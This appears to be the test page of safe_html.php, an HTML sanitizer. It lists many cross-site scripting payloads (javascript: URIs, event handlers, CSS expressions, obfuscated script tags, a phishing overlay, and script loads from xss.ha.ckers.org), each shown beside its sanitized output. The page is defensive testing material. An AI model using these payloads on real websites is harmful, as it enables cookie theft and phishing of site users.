For more documentation, source code, and demonstration see the safe_html.php homepage.
Instructions In general, if you don’t see any JavaScript alert boxes while viewing this page, and this message is visible, then all tests have been successful.
Text in blue is rendered html as sanitized by safe_html(). Text in red is original markup. Text in green is sanitized markup.
I think <em>javascript:foo()</em> is the best method.I think <em>javascript:foo()</em> is the best method.<!-- safe_html.php/0.6 -->I think <a href="javascript:alert(document.cookie);">you should click this</a>.I think you should click this.Experiencing technical difficulties, click here to re-try.
<p style="position: absolute; top: 0px; left: 0px;
width: 98%; height: 98%;
background-color: white;">
Experiencing technical difficulties,
<a href="http://10.0.17.128/?action=login">click here to re-try</a>.
</p><p >
Experiencing technical difficulties,
<a href="http://10.0.17.128/?action=login">click here to re-try</a>.
</p><!-- safe_html.php/0.6 -->Let's break <a href="http://google.com/">all other links!Let's break <a href="http://google.com/">all other links!</a><!-- safe_html.php/0.6 -->Encoded entities are not javascript.Encoded entities are not javascript.<!-- safe_html.php/0.6 --><IMG src="java<script>:alert(123)" "><SCRIPT>alert("XSS")</SCRIPT>"><!--xss stripped after processing-->'';!--"<XSS>=&{()}'';!--"=&{()}<!-- safe_html.php/0.6 --><IMG SRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')><IMG SRC=JaVaScRiPt:alert('XSS')><IMG SRC=javascript:alert("XSS")><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC="javascri	pt:alert('XSS');"><IMG SRC="javascri
pt:alert('XSS');"><IMG SRC="javascri
pt:alert('XSS');"><IMG
SRC
=
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
><IMG SRC=java�script:alert("XSS")><SCR�IPT>alert("XSS")</SCR�IPT>alert("XSS")<!-- safe_html.php/0.6 --><IMG SRC=" javascript:alert('XSS');"><SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>a=/XSS/
alert(a.source)<!-- safe_html.php/0.6 --><BODY BACKGROUND="javascript:alert('XSS')"><img src="/icons/image2.gif" ONLOAD=alert('XSS')><img src="/icons/image2.gif" <!-- safe_html.php/0.6 --> <img src="/icons/image2.gif" oNLoad="alert('XSS')"><img src="/icons/image2.gif" ><!-- safe_html.php/0.6 --> <img src="/icons/image2.gif" onload='alert("XSS")' ><img src="/icons/image2.gif" ><!-- safe_html.php/0.6 --> <img src="/icons/image2.gif" FSCommand=alert('XSS')><img src="/icons/image2.gif" <!-- safe_html.php/0.6 --> <img src="/icons/image2.gif" seekSegmentTime="alert('XSS')"><img src="/icons/image2.gif" ><!-- safe_html.php/0.6 --><IMG DYNSRC="javascript:alert('XSS')"><IMG LOWSRC="javascript:alert('XSS')"><BGSOUND SRC="javascript:alert('XSS');"><BR SIZE="&{alert('XSS')}"><BR SIZE="&{alert('XSS')}"><!-- safe_html.php/0.6 --><LAYER SRC="http://xss.ha.ckers.org/a.js"></layer><!-- safe_html.php/0.6 --><LINK REL="stylesheet" HREF="javascript:alert('XSS');"><IMG SRC='vbscript:msgbox("XSS")'><IMG SRC="mocha:[code]"><IMG SRC="mocha:[code]"><!-- safe_html.php/0.6 --><IMG SRC="livescript:[code]"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><IFRAME SRC=javascript:alert('XSS')></IFRAME><FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET><TABLE BACKGROUND="javascript:alert('XSS')"><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="behaviour: url('http://xss.ha.ckers.org/exploit.htc');"><!-- safe_html.php/0.6 --><DIV STYLE="width: expression(alert('XSS'));"><!-- safe_html.php/0.6 --><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>@im\port'\ja\vasc\ript:alert("XSS")';<!-- safe_html.php/0.6 --><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS')")}</STYLE><!-- safe_html.php/0.6 --><IMG STYLE='no\xss:noxss("/*");
xss:ex/*XSS*/pression(alert("XSS"))'><IMG ><!-- safe_html.php/0.6 --><STYLE TYPE="text/javascript">alert('XSS');</STYLE>alert('XSS');<!-- safe_html.php/0.6 --><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>BODY{background:url("javascript:alert('XSS')")}<BASE HREF="javascript:alert('XSS');//"><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT><!-- safe_html.php/0.6 --><XML SRC="javascript:alert('XSS');"><SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT><!-- safe_html.php/0.6 --><IMG SRC="javascript:alert('XSS')"<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--><!-- safe_html.php/0.6 --><? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?><!-- safe_html.php/0.6 -->+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<!-- safe_html.php/0.6 --><SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><!-- safe_html.php/0.6 --><SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><!-- safe_html.php/0.6 --><SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><!-- safe_html.php/0.6 --><SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><!-- safe_html.php/0.6 --><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>document.write("<!-- safe_html.php/0.6 -->Run the tests again, but without safe_html() support to see what happens (but don’t blame me if it crashes your browser...)